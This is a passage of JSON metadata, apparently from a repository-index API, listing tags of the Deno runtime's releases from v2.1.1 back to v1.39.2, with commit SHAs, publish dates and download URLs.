"sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20: